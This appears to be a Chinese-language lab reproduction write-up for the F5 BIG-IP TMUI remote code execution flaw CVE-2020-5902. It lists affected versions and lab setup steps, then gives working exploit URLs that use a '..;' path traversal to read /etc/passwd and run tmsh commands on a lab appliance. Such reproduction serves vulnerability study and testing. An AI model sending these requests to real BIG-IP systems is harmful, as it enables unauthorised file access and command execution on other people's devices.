F5_BigIP远程代码执行-CVE-2020-5902

漏洞详情

F5 BIG-IP 是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。
在 F5 BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞。
未授权的远程攻击者通过向该页面发送特制的请求包,可以造成任意Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。

影响范围

  • F5 BIG-IP 15.x 已知易受攻击版本 15.1.0、15.0.0
  • F5 BIG-IP 14.x 已知易受攻击版本 14.1.0-14.1.2
  • F5 BIG-IP 13.x 已知易受攻击版本 13.1.0-13.1.3
  • F5 BIG-IP 12.x 已知易受攻击版本 12.1.0-12.1.5
  • F5 BIG-IP 11.x 已知易受攻击版本 11.6.1-11.6.5

环境搭建

下载地址:
https://login.f5.com/resource/login.jsp?ctx=719748

选择:
BIGIP-15.0.0-0.0.39.ALL_1SLOT-vmware.ova

利用VW打开后,使用默认账号密码进行登入。
账号:root
密码:default

登入后输入config进行配置IP地址。
logo

配置成功后,浏览器访问该IP地址,https://192.168.131.134/。
logo

漏洞复现

读取任意文件:

https://192.168.131.134/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
logo

远程执行tmsh命令:

https://192.168.131.134/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin